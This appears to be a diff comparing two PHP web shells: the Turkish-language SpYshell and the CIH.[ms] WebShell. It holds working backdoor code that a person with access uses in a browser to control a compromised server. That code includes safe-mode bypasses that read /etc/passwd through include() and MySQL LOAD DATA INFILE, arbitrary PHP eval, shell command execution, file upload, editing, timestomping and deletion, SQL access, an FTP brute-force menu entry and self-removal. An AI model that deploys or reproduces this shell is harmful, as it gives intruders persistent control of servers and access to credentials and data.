| 322 | + | </tr></table>'; |
| 323 | ||
| 324 | # Safe-mode | |
| 325 | # working | |
| 326 | - | $cmdaliases = array( |
| 326 | + | if (isset($_POST['safe_mode'])){
|
| 327 | ||
| 328 | - | array("-----------------------------------------------------------", "dir"),
|
| 328 | + | echo " |
| 329 | <table style='width:100%; font-size:10px;'> | |
| 330 | - | array("Butun Acik Portlari goster.", "netstat -an")
|
| 330 | + | <tr style='background:#272727;' ><td style='padding:10px; border-top:1px solid #2e2e2e;'><b>Try to read file(include):</b></td></tr> |
| 331 | <tr style='background:#242424;' ><td style='padding:10px;'><form action='' method='post' style='padding:0px; margin:0px;'> | |
| 332 | - | ); |
| 332 | + | <input type='text' name='sm_inc' style='width:80%;' class='form' value='/etc/passwd'/> |
| 333 | <input class='form' style='width:60px;' type='submit' value='try'></form></td></tr> | |
| 334 | <tr style='background:#252525;'><td style='border-bottom:1px solid #2e2e2e;'> </td></tr> | |
| 335 | <tr style='background:#222; font-size:1px;'><td> </td></tr> | |
| 336 | ||
| 337 | <tr style='background:#272727;' ><td style='padding:10px; border-top:1px solid #2e2e2e;'><b>Try to read file(include):</b></td></tr> | |
| 338 | - | $sess_cookie = "ashshvars"; // Cookie-variable name |
| 338 | + | <tr style='background:#242424;' > |
| 339 | <td style='padding:10px;'> | |
| 340 | <form action='' method='post' style='padding:0px; margin:0px;'> | |
| 341 | <input type='text' name='mysql_host' style='width:15%;' class='form' value='localhost'/> | |
| 342 | - | $usefsbuff = true; //Buffer-function |
| 342 | + | <span style='margin-left:5px; margin-right:5px;'>:</span><input type='text' name='mysql_port' style='width:40px' class='form' value='3306'/> |
| 343 | <span style='margin-left:5px; margin-right:5px;'>database:</span><input type='text' name='mysql_db' style='width:15%;' class='form' value='dbname'/> | |
| 344 | - | $copy_unset = false; //Remove copied files from buffer after pasting |
| 344 | + | <span style='margin-left:5px; margin-right:5px;'>login:</span><input type='text' name='mysql_login' style='width:15%;' class='form' value='dblogin'/> |
| 345 | <span style='margin-left:5px; margin-right:5px;'>password:</span><input type='text' name='mysql_passw' style='width:15%;' class='form' value='dbpassword'/> | |
| 346 | <input type='text' name='mysql_file' style='margin-top:3px;width:700px;' class='form' value='/etc/passwd'/><br/> | |
| 347 | <input type='submit' name='sm_mysql' value='try' class='form' style='margin-top:8px;width:50px;'> | |
| 348 | - | //Quick launch |
| 348 | + | </form></td></tr> |
| 349 | <tr style='background:#252525;'><td style='border-bottom:1px solid #2e2e2e;'> </td></tr> | |
| 350 | - | $quicklaunch = array( |
| 350 | + | <tr style='background:#222; font-size:1px;'><td> </td></tr> |
| 351 | </table> | |
| 352 | - | array("<img src=\"".$surl."act=img&img=home\" alt=\"Ana Sayfa\" height=\"20\" width=\"20\" border=\"0\">",$surl),
|
| 352 | + | |
| 353 | do_footer($ver); die(); | |
| 354 | - | array("<img src=\"".$surl."act=img&img=back\" alt=\"Geri\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
|
| 354 | + | |
| 355 | # Safe_Mode functions | |
| 356 | - | array("<img src=\"".$surl."act=img&img=forward\" alt=\"Ileri\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
|
| 356 | + | if (isset($_POST['sm_inc'])) |
| 357 | {
| |
| 358 | - | array("<img src=\"".$surl."act=img&img=up\" alt=\"Yukari\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
|
| 358 | + | echo "<textarea cols='170' rows='34' class='txt' style='width:98%;' > "; |
| 359 | include($_POST['sm_inc']); | |
| 360 | - | array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Yenile\" height=\"20\" width=\"17\" border=\"0\">",""),
|
| 360 | + | echo "</textarea><br/><input type='button' class='form' value='go back' onClick='javascript:history.back();'><br/><br/>"; |
| 361 | do_footer($version); die();} | |
| 362 | - | array("<img src=\"".$surl."act=img&img=search\" alt=\"Arama\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
|
| 362 | + | |
| 363 | if(isset($_POST['sm_mysql'])) | |
| 364 | - | array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Tampon\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
|
| 364 | + | |
| 365 | echo "<textarea cols='170' rows='34' class='txt' style='width:98%;' > "; | |
| 366 | - | array("<b>Cyriptos</b>",$surl."act=encoder&d=%d"),
|
| 366 | + | if(!isset($_POST['mysql_port']) || empty($_POST['mysql_port'])) { $_POST['mysql_port'] = "3306"; }
|
| 367 | $db = mysql_connect($_POST['mysql_host'].':'.$_POST['mysql_port'],$_POST['mysql_login'],$_POST['mysql_passw']); | |
| 368 | - | array("<b>Araclar</b>",$surl."act=tools&d=%d"),
|
| 368 | + | if($db){
|
| 369 | if(mysql_select_db($_POST['mysql_db'],$db)) | |
| 370 | - | array("<b>Islem.</b>",$surl."act=processes&d=%d"),
|
| 370 | + | {$sql = "DROP TABLE IF EXISTS cih_tb;"; mysql_query($sql);
|
| 371 | $sql = "CREATE TABLE `cih_tb` ( `file` LONGBLOB NOT NULL );"; | |
| 372 | - | array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),
|
| 372 | + | mysql_query($sql);$sql = "LOAD DATA INFILE \"".$_POST['mysql_file']."\" INTO TABLE cih_tb;"; |
| 373 | mysql_query($sql);$sql = "SELECT * FROM cih_tb;"; | |
| 374 | - | array("<b>Guvenlik</b>",$surl."act=security&d=%d"),
|
| 374 | + | $r = mysql_query($sql); |
| 375 | while(($r_sql = mysql_fetch_array($r))) { echo htmlspecialchars($r_sql[0]); }
| |
| 376 | - | array("<b>SQL</b>",$surl."act=sql&d=%d"),
|
| 376 | + | $sql = "DROP TABLE IF EXISTS cih_tb;"; |
| 377 | mysql_query($sql); | |
| 378 | - | array("<b>PHP-code</b>",$surl."act=eval&d=%d"),
|
| 378 | + | }else echo "Can\'t select database"; |
| 379 | mysql_close($db); | |
| 380 | - | array("<b>Bildirim</b>",$surl."act=feedback&d=%d"),
|
| 380 | + | }else echo "-- Could not connect to MySQL server"; |
| 381 | echo "</textarea><br/><input type='button' class='form' value='go back' onClick='javascript:history.back();'><br/><br/>"; | |
| 382 | - | array("<b>Imha Et</b>",$surl."act=selfremove"),
|
| 382 | + | do_footer($version);die();} |
| 383 | ||
| 384 | - | array("<b>Exit</b>","#\" onclick=\"if (confirm('Eminmisin dosttum?')) window.close()")
|
| 384 | + | |
| 385 | ||
| 386 | if ($safe_mode == "On" && !isset($_POST['safe_mode'])) | |
| 387 | {
| |
| 388 | notice('<form method="post" style="margin:0px;"><b>safe_mode</b> is <b>On.</b><input type="submit" name="safe_mode" value="Click on this message to start working" style="font-size:10px; color:#999; font-family:Verdana;border:0px; background:#252525;"/></form>');
| |
| 389 | } | |
| 390 | - | //Highlight-code colors |
| 390 | + | |
| 391 | if (isset($_POST['fileact'])){switch($_POST['fileact']){
| |
| 392 | - | $highlight_background = "#c0c0c0"; |
| 392 | + | case 'New File': |
| 393 | $cdir = $_POST['curdir']; | |
| 394 | - | $highlight_bg = "#FFFFFF"; |
| 394 | + | echo "<form method='post' action='' style='margin:0px; padding:0px;'><textarea cols='170' rows='34' class='txt' style='width:98%;' name='wrcont'></textarea> |
| 395 | ||
| 396 | - | $highlight_comment = "#6A6A6A"; |
| 396 | + | <input type='hidden' name='path' value='".$_POST['curdir']."'><input type='hidden' name='curdir' value='".$_POST['curdir']."'> |
| 397 | <input type='text' name='nfname' class='form' style='width:28%; background:#252525;margin-bottom:1px; margin-right:1px;' value='file.txt'><input type='submit' name='wrfile' class='form' value='create file' style='width:70%'></form><br/>"; | |
| 398 | - | $highlight_default = "#0000BB"; |
| 398 | + | do_footer($ver); die();break; |
| 399 | ||
| 400 | - | $highlight_html = "#1300FF"; |
| 400 | + | case 'New Dir': |
| 401 | $curdir = $_POST['curdir']; | |
| 402 | - | $highlight_keyword = "#007700"; |
| 402 | + | echo "<form method='post' action='' style='margin:0px;'><input type='hidden' name='curdir' value='$curdir'><input type='hidden' name='path' value='$curdir'><input type='text' name='dirname' class='form' style='width:90%; margin-right:1px;' size='100'><input type='submit' style='width:60px;' class='form' value='go!'></form><br/>"; |
| 403 | do_footer($ver);die();break; | |
| 404 | - | $highlight_string = "#000000"; |
| 404 | + | case 'Upload': |
| 405 | if (isset($_FILES['userfile'])) {
| |
| 406 | $file = $_FILES['userfile']; | |
| 407 | $curdir = $_POST['path']; | |
| 408 | - | @$f = $_REQUEST["f"]; |
| 408 | + | if(isset($_POST['newfilech']) && !empty($_POST['newfile'])) {$nfn=$_POST['newfile'];} else { $nfn = $file['name']; }
|
| 409 | if($file['error']!=0) error($file['error']); | |
| 410 | - | @extract($_REQUEST["ashshcook"]); |
| 410 | + | else{copy($file['tmp_name'], $curdir.'/'.$nfn);if(!file_exists($curdir.'/'.$file['name']))error("Upload failed. (Can't copy temp file ".$file['tmp_name']." into current directory)", $ver);else{notice("File ".$nfn." was uploaded successfuly..</div>");}}}
|
| 411 | echo "<table style='width:100%; font-size:10px;'><tr style='background:#272727;' ><td style='padding:10px; border-top:1px solid #2e2e2e;'><b>Upload from your computer:</b></td></tr> | |
| 412 | <tr style='background:#242424;' ><td style='padding:10px;'><form action='' enctype='multipart/form-data' method='post' style='padding:0px; margin:0px;'><input type='hidden' name='path' value='$path'> <input type='hidden' name='fileact' value='Upload'><input name='userfile' size='85' value='' class='form' type='file' style='border:1px solid #444;'><br/><br/>New name :<input name='newfilech' value='1' type='checkbox'><input type='text' name='newfile' style='width:20%;' class='form' value='filename.php'/><input type='submit' style='width:60px;' class='form' value='go!'></form></td></tr> | |
| 413 | <tr style='background:#252525;'><td style='border-bottom:1px solid #2e2e2e;'> </td></tr> | |
| 414 | - | //END CONFIGURATION |
| 414 | + | <tr style='background:#222; font-size:1px;'><td> </td></tr></table>";do_footer($ver);die();break; |
| 415 | }} | |
| 416 | # File Manager : File actions | |
| 417 | if(isset($_POST['newname'])) // rename | |
| 418 | {rename($_POST['ffile'], $_POST['newname']);if(!file_exists($_POST['newname'])){error('Could not rename '); }notice("File was successfuly renamed to ".$_POST['newname']."...");}
| |
| 419 | if(isset($_POST['newpath'])) //copy | |
| 420 | - | // \/ Next code isn't for editing \/ |
| 420 | + | {copy($_POST['ffile'], $_POST['newpath']);if(!file_exists($_POST['newpath'])){error('Could not copy file'); }echo " <div class='notice'>File was successfuly copied to <b>".$_POST['newpath']."</b>...</div>";}
|
| 421 | if(isset($_POST['chmod'])) // chmod | |
| 422 | - | @set_time_limit(0); |
| 422 | + | {$a = chmod($_POST['ffile'], $_POST['chmod']);if(!$a){error('Could not change permissions :o(', $ver);}echo " <div class='notice'>We hope that permissions for file were successfuly changed to <b>".$_POST['chmod']."</b> ^^</div>";}
|
| 423 | if(isset($_POST['touch'])) // touch | |
| 424 | - | $tmp = array(); |
| 424 | + | {$dt = strtotime($_POST['touch']); if(!touch($_POST['ffile'], $dt)){ error('Could not change touch time...', $ver);} echo " <div class='notice'>We hope that touch for file were successfuly changed to <b>".$_POST['touch']."</b> ^^</div>";}
|
| 425 | if (isset($_POST['ffile']) && isset($_POST['wrcont'])){ // write into file
| |
| 426 | - | foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
|
| 426 | + | $wrpath = $_POST['ffile']; $wrcont = $_POST['wrcont'];$fh = fopen($wrpath, 'w');if ($fh){fwrite($fh, $wrcont);fclose($fh); }else {error('Couldn\'t write to file..');}echo "<div class='notice'>File <b>$wrpath</b> was successfuly modified</div>";}
|
| 427 | if (isset($_POST['nfname']) && isset($_POST['curdir']) && isset($_POST['wrcont'])) // new file | |
| 428 | - | $s = "!^(".implode("|",$tmp).")$!i";
|
| 428 | + | {$file1 = $_POST['curdir']."/".$_POST['nfname'];$fh = fopen($file1, 'w');$r = fwrite($fh, $_POST['wrcont']);fclose($fh);if (!file_exists($file1)){error('Could not create a file..');} else {notice("File was successfuly created");}}
|
| 429 | if (isset($_POST['dirname']) && isset($_POST['curdir'])) // new directory | |
| 430 | - | if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://xxxxxxxxxxxxxxxxxxx\">SpYshell</a>: Erisim Engellendi - Senin Host (".getenv("REMOTE_ADDR").") not allow");}
|
| 430 | + | {$curdir = $_POST['curdir']; mkdir($curdir.'/'.$_POST['dirname']);if(file_exists($curdir.'/'.$_POST['dirname'])){notice($curdir.'/'.$_POST['dirname']." was successfuly created.");}else{error('An error occured while creating dir', $ver);}
|
| 431 | } | |
| 432 | - | if (!empty($login)) |
| 432 | + | # File Manager : Directory actions |
| 433 | if (isset($_POST['ddo']) && isset($_POST['dirr'])){
| |
| 434 | switch($_POST['ddo']){
| |
| 435 | case 'rename': | |
| 436 | - | if (empty($md5_pass)) {$md5_pass = md5($pass);}
|
| 436 | + | echo" <form method='post' action='' style='margin:0px;'><input type='hidden' name='path' value='".$pwd."'><input type='text' name='ffile' class='form' value='".$_POST['dirr']."' style='width:40%'><span style='margin-left:4px; margin-right:4px;'>to</span><input type='text' name='newname' class='form' value='".$_POST['dirr']."' style='width:40%'><input type='submit' style='width:60px;' class='form' value='rename!'></form><br/>"; |
| 437 | do_footer($ver);die();break; | |
| 438 | - | if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) |
| 438 | + | case 'delete': |
| 439 | rmdir($_POST['dirr']);if(file_exists($_POST['dirr'])){error('Could not delete directory');}notice($_POST['dirr']." was successfuly deleted.");do_footer($version);break;}}
| |
| 440 | if (isset($_POST['fdo']) && isset($_POST['ffile']) && $_POST['fdo']=='delete'){
| |
| 441 | unlink($_POST['ffile']);if(file_exists($_POST['ffile'])){error('Could not delete file');}notice("<b>".$_POST['ffile']."</b> was successfuly deleted.");break;
| |
| 442 | - | if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |<br>"," ",$donated_html));}
|
| 442 | + | }if(isset($_POST['diract'])) |
| 443 | {$path = $_POST['cmdir']; $perms = fperms($_POST['cmdir']);
| |
| 444 | - | header("WWW-Belgele: Basic realm=\"SpYshell ".$shver.": ".$login_txt."\"");
|
| 444 | + | echo" |
| 445 | <div style='padding:2px;'><div style='background:#272727; padding:3px; margin-bottom:3px;text-align:left;'><b>File actions</b></div><div style='background:#272727; padding:3px; font-size:9px; text-align:left;'>dir:$path | permissions: <b>$perms </b> </div><div style='padding:4px; padding-left:30px; font-size:9px; font-weight:bold; color:#999; text-align:left;'><form method='post' action=''><input type='hidden' name='dirr' value='$path'><input type='hidden' name='path' value='$path'><input type='hidden' name='curpath' value='$pp'><input type='hidden' name='filename' value='$ppp'> ><input type='submit' class='m' name='ddo' value='rename' style='margin-bottom:0px; background:#222;'><br/> ><input type='submit' class='m' name='ddo' value='delete' style='margin-bottom:0px; background:#222;'><br/><br/><br/></form></div><div style='background:#272727; font-size:9px;'> </div></div>";do_footer($ver);die();} | |
| 446 | - | header("HTTP/1.0 401 Yetkisiz");
|
| 446 | + | # switch $do |
| 447 | # | |
| 448 | - | exit($accessdeniedmess); |
| 448 | + | if (isset($_REQUEST['do'])) |
| 449 | {
| |
| 450 | switch ($_REQUEST['do']){
| |
| 451 | case 'mysql': | |
| 452 | if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhost = 'localhost';}if (isset($_POST['mysqlw_db'])){$dbname = $_POST['mysqlw_db'];} else {$dbname = 'dbname';}if (isset($_POST['mysqlw_login'])){$dblogin = $_POST['mysqlw_login'];}else {$dblogin = 'dblogin';}if (isset($_POST['mysqlw_passw'])){$dbpass = $_POST['mysqlw_passw'];}else {$dbpass = 'dbpassword';}if (isset($_POST['mysqlw_port'])){$dbport = $_POST['mysqlw_port'];} else {$dbport = '3306';}if (!empty($_POST['sql'])){echo '<div >';$sqlq = $_POST['sql'];$db = mysql_connect($dbhost.':'.$dbport,$dblogin,$dbpass);if($db)
| |
| 453 | {if(!empty($_POST['mysqlw_db'])) { mysql_select_db($_POST['mysqlw_db'],$db); }$queries = explode(';',$sqlq);foreach($queries as $number=>$query) {
| |
| 454 | - | if ($act != "img") |
| 454 | + | $number++;$r = safq($query); $error = mysql_error($db);if($error == 'Query was empty'){ break;}
|
| 455 | echo "<div class='str' style='border-top:1px solid #333; '>query # <b>".$number."</b>:".htmlspecialchars($query)."</div>"; | |
| 456 | if ($error){ notice("Error : <b>".$error."</b>"); }
| |
| 457 | else {if(is_array($r)){echo '<table style="width:100%; background:#222;">';
| |
| 458 | - | $lastdir = realpath(".");
|
| 458 | + | if(is_array($r[0])){echo "<tr style='background:#292929; font-size:10px;'>";foreach($r[0] as $n=>$v){echo "<td style='padding:5px;'><b>$n</b></td>";}echo '</tr>';}foreach($r as $a){echo "<tr style='background:#232323;'>";
|
| 459 | if(is_array($a)){foreach($a as $n=>$v){echo "<td class='my'>$v</td>";}}else{echo "<td class='file'>$a</td>";}echo '</tr>';}echo '</table>';}else{echo $r;}if(($rows = mysql_affected_rows($db))>=0) {
| |
| 460 | - | chdir($curdir); |
| 460 | + | echo "<div class='str' style='margin-top:3px; border-bottom:1px solid #333; padding:3px;'>affected rows : <b>".$rows."</b></div>"; } |
| 461 | }} mysql_close($db);}else {notice('Error: Could not connect to database..');} echo '</div>'; }
| |
| 462 | - | if ($selfwrite or $updatenow) {@ob_clean(); ashsh_getupdate($selfwrite,1); exit;}
|
| 462 | + | echo "<form action='' method='post' style='margin:0px; margin-top:15px;'> |
| 463 | <table style='width:100%; height:40%'><tr><td valign='top' style='background:#272727; padding:3px;'><textarea class='txt' cols='70' rows='15' name='sql' style='width:100%; height:99%'>"; | |
| 464 | - | $sess_data = unserialize($_COOKIE["$sess_cookie"]); |
| 464 | + | if(isset($_POST['sql'])){echo $_POST['sql'];} else echo 'SHOW DATABASES;';
|
| 465 | echo "</textarea></td><td style='width:150px; background:#272727;' valign='top' > | |
| 466 | - | if (!is_array($sess_data)) {$sess_data = array();}
|
| 466 | + | <input type='text' name='mysqlw_host' class='txt' style='margin:10px; height:24px;' value='$dbhost'/><input type='text' name='mysqlw_db' class='txt' style='margin:10px; height:24px;' value='$dbname'/><input type='text' name='mysqlw_login' class='txt' style='margin:10px; height:24px;' value='$dblogin'/><input type='txt' name='mysqlw_passw' class='txt' style='margin:10px; height:24px;' value='$dbpass'/><input type='text' name='mysqlw_port' class='txt' style='margin:10px; height:24px;' value='$dbport'/><br/></td><tr><td colspan=2 valign='top' style='height:5%;'><input type='hidden' name='do' value='mysql'><input type='submit' class='txt' style='width:100%; margin:0px; margin-bottom:5px; ' value='go!'></td></tr></table></form><br/>"; |
| 467 | do_footer($ver); die(); break; | |
| 468 | - | if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
|
| 468 | + | case 'server': |
| 469 | echo '<table class="str" style="width:100%">';foreach($_SERVER as $k=>$v) | |
| 470 | - | if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
|
| 470 | + | {echo "<tr style='background:#262626; color:#666'><td style='padding:3px;'><b>$k</b></td><td>$v</td></tr>";}echo '</table>';do_footer($ver);
|
| 471 | die();break; | |
| 472 | case 'envinfo': | |
| 473 | echo '<table class="str" style=" width:100%">';foreach($_ENV as $k=>$v) | |
| 474 | - | $disablefunc = @ini_get("disable_functions");
|
| 474 | + | {echo "<tr style='background:#262626; color:#666'><td style='padding:3px;'><b>$k</b></td><td style='padding:3px;'>$v</td></tr>";}echo '</table><br/>';do_footer($ver);die();break;
|
| 475 | case 'delete': | |
| 476 | - | if (!empty($disablefunc)) |
| 476 | + | if(unlink(substr(strrchr($_SERVER['PHP_SELF'],"/"),1))==true){echo "<div class='notice'>cihshell has been deleted successfully..bye-bye ): </div><br/><br/>"; do_footer($ver);}else{error('Unable to delete shell', $ver);} die();break;
|
| 477 | case 'eval': | |
| 478 | echo "<form method='post' action='' style='padding:0px; margin-top:5px;'><input type='hidden' name='do' value='eval' style='border-bottom:1px solid #444;'> <textarea name='eval' class='form' style='height:100px;'>"; | |
| 479 | if (isset($_POST['eval'])){echo $_POST['eval'];} else {echo 'code here (:';}
| |
| 480 | - | $disablefunc = str_replace(" ","",$disablefunc);
|
| 480 | + | echo "</textarea><input type='submit' class='form' value='do' style='width:98%; margin-top:3px; border:0px; background:#262626;'></form><br/>"; |
| 481 | if (isset($_POST['eval'])){
| |
| 482 | - | $disablefunc = explode(",",$disablefunc);
|
| 482 | + | echo "<table class='txt' style='margin-left:13px; width:98%; height:60%'><tr><td valign='top'>";code_eval();echo "</td></tr></table><br/>";} |
| 483 | do_footer($ver);die(); break; | |
| 484 | case 'shell': | |
| 485 | echo " <textarea class='txt' style='width:98%; height:60%; background:#262626' rows='30'>";if($safe_mode == 'On'){ echo "Safe mode is on..";}if(isset($_POST['alias'])){ foreach ($alias as $k=>$v) { if ($_POST['alias'] == $k){cmd_exec($v);}}} else {cmd_exec($safe_mode);}if(isset($_POST['cmdir'])) {$dirr = $_POST['cmdir'];} else {$dirr = $path;}echo "</textarea>";echo "<form method='post' action='' style='padding:0px; margin-top:5px; margin-bottom:15px;'><input type='hidden' name='do' value='shell'><input type='text' name='cmd' value='";if (isset($_POST['cmd'])){echo $_POST['cmd'];} elseif ($os == 'win'){echo 'dir';} else{echo 'ls';}echo "' class='form' style='width:98%; margin-bottom:2px;'><input type='text' name='cmdir' value='$dirr' class='form' style='color:#444;width:98%'><input type='submit' class='form' value='do' style='width:98%; margin-top:3px; border:0px; background:#262626;'></form>";echo"<form method='post' action='' style='border-top:1px solid #282828; margin:0px;'><select name='alias' class='form' style='width:98%; margin-top:5px;'>";foreach($alias as $k=>$v){echo "<option>$k</option>";}echo "</select><input type='hidden' name='do' value='shell'><input type='hidden' name='cmdir' value='$dirr'><input type='submit' class='form' value='do' style='width:98%; margin-top:3px; border:0px; background:#262626;'</form><br/><br/>";do_footer($ver); die();break;
| |
| 486 | case 'cihshell':echo "<div class='str' style='text-align:center;'><table class='str' style='width:100%'><tr> | |
| 487 | <td style='border-right:1px solid #333; width:200px;'><div style=' padding:50px; margin-top:50px; margin-bottom:50px; border-top:1px solid #333; border-bottom:1px solid #333;'>Coded by <b>Berkut</b>. <br/><br/>© 2007 <br/><hr>Fixed by <b>DCRM</b>. <br/></br>© 2008 <br/></div></td><td valign='top' style='padding-left:30px;'><br/><br/><span style='font-size:20px; color:#666;'>CIH.[ms] WebShell<sup style='font-size:12px; color:#444;'> v.$ver</sup></span><br/><br/><br/>It has so many strong points that it is impossible to write them here (:</td></tr></table></div>";do_footer($ver); die();break; | |
| 488 | - | if (!function_exists("ash_buff_prepare"))
|
| 488 | + | default: error('There is no such function',$ver);
|
| 489 | break;}} | |
| 490 | # file actions | |
| 491 | if(is_file($path)) | |
| 492 | - | function ash_buff_prepare() |
| 492 | + | {$perms = fperms($path); $size = filesize($path."/".$file); $size = conv_size($size); $size_fix = conv_size(filesize($path)); $pp = $_POST['f_path'];$ppp = $_POST['f_file'];
|
| 493 | echo "<div style='padding:2px;'><div style='background:#292929; padding:10px; margin-bottom:3px; text-align:left;'><b>File actions</b></div><div style='background:#272727; padding:3px; font-size:9px; text-align:left;'>file: <span style='color:#666;'>$path</span> | permissions: <b style='color:#666;'>$perms </b> | size: <span style='color:#666;'>$size_fix</span> | Create time: <span style='color:#666;'>".date("d.m.Y H:i:s",filectime($path))."</span> | Modify time: <span style='color:#666;'>".date("d.m.Y H:i:s",filemtime($path))."</span></div><table style='width:100%; font-size:10px;'><tr><td style='width:200px; border-right:1px solid #292929; vertical-align:top; padding:0px; padding-left:5px;'> <form method='post' action=''><input type='hidden' name='ffile' value='$path'><input type='hidden' name='path' value='$path'><input type='hidden' name='curpath' value='$pp'><input type='hidden' name='filename' value='$ppp'><div style='width:200px; border-top:1px solid #292929; border-bottom:1px solid #292929; text-align:center; margin-top:5px;'> <input type='submit' class='fa' name='fdo' value='view' style=''></div><div style='width:200px; border-top:1px solid #292929; border-bottom:1px solid #292929; text-align:center; margin-top:5px;'><input type='submit' class='fa' name='fdo' value='view in HEX' style=''></div> <div style='width:200px; border-top:1px solid #292929; border-bottom:1px solid #292929; text-align:center; margin-top:5px;'> <input type='submit' class='fa' name='fdo' value='edit'></div> <div style='width:200px; border-top:1px solid #292929; border-bottom:1px solid #292929; text-align:center; margin-top:5px;'> <input type='submit' class='fa' name='fdo' value='preview' ></div><div style='width:200px; border-top:1px solid #292929; border-bottom:1px solid #292929; text-align:center; margin-top:5px;'><input type='submit' class='fa' name='fdo' value='download'></div><div style='width:200px; border-top:1px solid #292929; border-bottom:1px solid #292929; text-align:center; margin-top:40px;'><input type='submit' class='fa1' name='fdo' value='delete'></div><div style='width:200px; border-top:1px solid #292929; border-bottom:1px solid #292929; text-align:center; margin-top:5px;'> <input type='submit' class='fa1' name='fdo' value='copy' ></div><div style='width:200px; border-top:1px solid #292929; border-bottom:1px solid #292929; text-align:center; margin-top:5px;'><input type='submit' class='fa1' name='fdo' value='rename' ></div> <div style='width:200px; border-top:1px solid #292929; border-bottom:1px solid #292929; text-align:center; margin-top:5px;'><input type='submit' class='fa1' name='fdo' value='chmod' ></div> <div style='width:200px; border-top:1px solid #292929; border-bottom:1px solid #292929; text-align:center; margin-top:5px;'><input type='submit' class='fa1' name='fdo' value='touch' ></div></td><td style='padding:3px; vertical-align:top;'>";
| |
| 494 | if (isset($_POST['fdo']) && isset($_POST['ffile'])){
| |
| 495 | $ffile = $_POST['ffile']; | |
| 496 | - | global $sess_data; |
| 496 | + | switch($_POST['fdo']){
|
| 497 | case 'view': | |
| 498 | - | global $act; |
| 498 | + | fileread2($ffile, $stringnum); |
| 499 | break; | |
| 500 | - | foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
|
| 500 | + | case 'view in HEX': |
| 501 | ||
| 502 | - | foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
|
| 502 | + | $fi=fopen($path,"rb"); |
| 503 | if ($fi) {$str = fread($fi,filesize($path));$n=0;$a0="00000000<br/>";$a1="";$a2="";
| |
| 504 | - | $sess_data["copy"] = array_unique($sess_data["copy"]); |
| 504 | + | for ($i=0; $i<strlen($str); $i++) {$a1.=sprintf("%02X",ord($str[$i])).' ';switch (ord($str[$i])) {case 0: $a2.="0"; break;case 32: case 10:case 13: $a2.=" "; break;default: $a2.=htmlspecialchars($str[$i]);}$n++;if ($n==$hexdump_rows) {$n=0;if ($i+1<strlen($str)) $a0.=sprintf("%08X",$i+1)."<br>";$a1.="<br>";$a2.="<br>";}}echo "<table style='font-size:10px;'><tr><td style='border-right:1px solid #292929; color:#444; padding:4px;'>$a0</td><td style='color:#666; padding:4px;'>$a1</td><td style='border-left:1px solid #292929; color:#444; padding:4px;'>$a2</td></tr>";echo"</table>";
|
| 505 | }break; | |
| 506 | - | $sess_data["cut"] = array_unique($sess_data["cut"]); |
| 506 | + | case 'edit': |
| 507 | echo "<form method='post' action='' style='margin:0px; padding:0px;'><textarea cols='170' rows='34' class='txt' style='width:100%;' name='wrcont'> "; | |
| 508 | - | sort($sess_data["copy"]); |
| 508 | + | fileread($ffile);echo "</textarea><input type='hidden' name='ffile' value='$ffile'><input type='hidden' name='path' value='".$path."'><input type='submit' name='wrfile' class='form' value='save file' style='width:100%; margin-top:5px;'></form><br/>"; break; |
| 509 | case 'chmod': | |
| 510 | - | sort($sess_data["cut"]); |
| 510 | + | echo"<form method='post' action='' style='padding:0px; margin:0px;'><input type='hidden' name='path' value='".$_POST['curpath']."'><input type='text' name='chmod' class='form' value='".substr(sprintf('%o', fileperms($path)), -4)."' style='width:10%'><span style='margin-left:4px; margin-right:4px;'>for</span><input type='text' name='ffile' class='form' value='".$path."' style='width:70%'><input type='submit' style='width:60px;' class='form' value='change!'></form><br/>";break;
|
| 511 | ||
| 512 | - | if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
|
| 512 | + | case 'touch': |
| 513 | echo"<form method='post' action='' style='padding:0px; margin:0px;'><input type='hidden' name='path' value='".$_POST['curpath']."'><input type='text' name='touch' class='form' value='".date("d M Y H:i:s",filemtime($path))."' style='width:15%'><span style='margin-left:4px; margin-right:4px;'>for</span><input type='text' name='ffile' class='form' value='".$path."' style='width:70%'><input type='submit' style='width:60px;' class='form' value='change!'></form><br/>";break;
| |
| 514 | - | else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
|
| 514 | + | |
| 515 | case 'rename': | |
| 516 | echo" <form method='post' action='' style='padding:0px; margin:0px;'><input type='hidden' name='path' value='".$_POST['curpath']."'><input type='text' name='ffile' class='form' value='".$path."' style='width:40%'><span style='margin-left:4px; margin-right:4px;'>to</span><input type='text' name='newname' class='form' value='".$path."' style='width:40%'><input type='submit' style='width:60px;' class='form' value='rename!'></form><br/>";break; | |
| 517 | case 'copy': | |
| 518 | echo"<form method='post' action='' style='padding:0px; margin:0px;'><input type='hidden' name='path' value='".$_POST['curpath']."'><input type='text' name='ffile' class='form' value='".$path."' style='width:40%'><span style='margin-left:4px; margin-right:4px;'>to</span><input type='text' name='newpath' class='form' value='".$path."' style='width:40%'><input type='submit' style='width:60px;' class='form' value='copy!'></form><br/>";break; }} | |
| 519 | else {
| |
| 520 | - | ash_buff_prepare(); |
